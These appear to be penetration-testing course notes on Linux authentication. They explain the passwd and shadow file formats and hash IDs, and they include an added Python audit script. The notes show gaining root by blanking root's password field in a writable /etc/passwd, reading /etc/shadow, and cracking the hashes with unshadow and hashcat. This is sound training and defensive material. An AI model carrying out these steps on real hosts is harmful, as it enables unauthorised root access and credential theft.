Linux Authentication

Linux /etc/passwd

> cat /etc/passwd

...SNIP...
htb-student:x:1000:1000:,,,:/home/htb-student:/bin/bash
<username>:<password>:<uid>:<gid>:<comment>:<home directory>:<cmd executed after logging in>
htb-student:x:1000:1000:,,,:/home/htb-student:/bin/bash
If /etc/passwd is left writable by mistake, the password field of the root entry can be cleared:

Editing /etc/passwd - Before

root:x:0:0:root:/root:/bin/bash

Editing /etc/passwd - After

root::0:0:root:/root:/bin/bash

Then we can log in as root without a password:

[cry0l1t3@parrot]─[~]$ head -n 1 /etc/passwd

root::0:0:root:/root:/bin/bash


[cry0l1t3@parrot]─[~]$ su

[root@parrot]─[/home/cry0l1t3]#

Linux /etc/shadow

root@htb:~# cat /etc/shadow

...SNIP...
htb-student:$y$j9T$3QSBB6CbHEu...SNIP...f8Ms:18955:0:99999:7:::

breakdown:

<username>:<encrypted password>:<day of last change>:<min age>:<max age>:<warning period>:<inactivity period>:<expiration date>:<reserved field>
htb-student:$y$j9T$3QSBB6CbHEu...SNIP...f8Ms:18955:0:99999:7:::

breakdown of the password field:

$<id>$<salt>$<hashed>
$y$j9T$3QSBB6CbHEu...SNIP...f8Ms

what each <id> corresponds to:

ID        Cryptographic Hash Algorithm
$1$       MD5
$2a$      Blowfish
$5$       SHA-256
$6$       SHA-512
$sha1$    SHA1crypt
$y$       Yescrypt
$gy$      Gost-yescrypt
$7$       Scrypt
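
The following audit example is added here and is not part of the original notes. It checks passwd text for the empty password field and extra UID 0 accounts discussed above, maps shadow hashes to algorithms using the ID table, and tests a file mode for group/other write access. The function names, the WEAK set and the sample entries are assumptions constructed for illustration.

```python
import stat

# Hash IDs from the table above; WEAK is this example's own assumption.
HASH_IDS = {"1": "MD5", "2a": "Blowfish", "5": "SHA-256", "6": "SHA-512",
            "sha1": "SHA1crypt", "y": "Yescrypt", "gy": "Gost-yescrypt",
            "7": "Scrypt"}
WEAK = {"MD5", "SHA1crypt"}

# Constructed sample data, not taken from a real system.
SAMPLE_PASSWD = """root::0:0:root:/root:/bin/bash
svc:x:0:0:,,,:/home/svc:/bin/bash
htb-student:x:1000:1000:,,,:/home/htb-student:/bin/bash"""
SAMPLE_SHADOW = """root:$y$j9T$SALT$HASH:18955:0:99999:7:::
legacy:$1$SALT$HASH:18955:0:99999:7:::
daemon:*:18955:0:99999:7:::"""

def audit_passwd(text):
    """Flag empty password fields and UID 0 accounts other than root."""
    findings = []
    for line in filter(None, text.splitlines()):
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((fields[0], "malformed entry"))
            continue
        user, password, uid = fields[:3]
        if password == "":
            findings.append((user, "empty password field"))
        if uid == "0" and user != "root":
            findings.append((user, "UID 0 but not root"))
    return findings

def hash_algorithm(field):
    """Map a shadow password field to an algorithm via its $<id>$ prefix."""
    parts = field.split("$")
    if len(parts) < 3 or parts[0] != "":
        return None  # locked ("!", "*"), empty, or not in $<id>$ form
    return HASH_IDS.get(parts[1], "unknown")

def audit_shadow(text):
    """Flag shadow entries whose hash uses a scheme listed in WEAK."""
    findings = []
    for line in filter(None, text.splitlines()):
        user, _, rest = line.partition(":")
        algo = hash_algorithm(rest.split(":")[0])
        if algo in WEAK:
            findings.append((user, "weak hash: " + algo))
    return findings

def writable_by_non_owner(mode):
    """True if a file mode (as from os.stat) lets group or other write."""
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))
```

On a live host, pass the contents of /etc/passwd and /etc/shadow as text and os.stat("/etc/passwd").st_mode as the mode.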

Opasswd

/etc/security/opasswd stores old passwords; reading it requires administrator (root) rights.

Cracking Linux Credentials

1. Unshadow

sudo cp /etc/passwd /tmp/passwd.bak 
sudo cp /etc/shadow /tmp/shadow.bak 
unshadow /tmp/passwd.bak /tmp/shadow.bak > /tmp/unshadowed.hashes

2. Hashcat - Cracking Unshadowed Hashes

hashcat -m 1800 -a 0 /tmp/unshadowed.hashes rockyou.txt -o /tmp/unshadowed.cracked

Or, if the hashes are MD5: Hashcat - Cracking MD5 Hashes

> cat md5-hashes.list

qNDkF0zJ3v8ylCOrKB0kt0
E9uMSmiQeRh4pAAgzuvkq1
hashcat -m 500 -a 0 md5-hashes.list rockyou.txt